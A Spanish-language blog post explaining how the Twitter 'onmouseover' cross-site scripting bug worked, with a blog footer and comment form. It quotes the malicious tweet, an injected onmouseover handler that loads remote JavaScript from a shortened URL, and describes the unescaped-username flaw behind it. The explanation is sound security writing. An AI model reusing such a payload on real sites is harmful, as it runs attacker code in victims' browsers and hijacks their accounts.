¿Cómo funcionaba el último error de twitter: «onmouseover»?

Si usáis Twitter os habréis dado cuenta que ha sido un caso, cientos de comentarios raros que al movernos sobre ellos ocurría cualquier cosa, desde hacer un RT automático a vaya usted a saber quien, hasta recibir mensajes raros de tu navegador.

El culpable era un mensaje como este, que aparecía en tu timeline:

http://t.co/@"style="font-size:999999999999px;
"onmouseover="$.getScript('http:\u002f\u002fis.gd\xxxxxxx')"/

Analicemos este mensaje, ya que usa un acortador de url «http://t.co» y justo delante, lleva una @, lo que en el mundo de Twitter suele significar que estamos respondiendo a un usuario (por ejemplo @twitter). El problema viene cuando la @ se identifica erróneamente como que se quiere indicar un usuario (¿en una url?) y el texto que viene después se asume que es un nombre de un usuario, y se escribe en el código de la web siguiente (si, como oyes) por lo tanto donde iría un nombre de usuario, ahora va un bonito código html con su javascript integrado.

Mucha mas información aquí.

Please follow and like us:

Un pensamiento en “¿Cómo funcionaba el último error de twitter: «onmouseover»?

  1. Pingback: Bitacoras.com

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *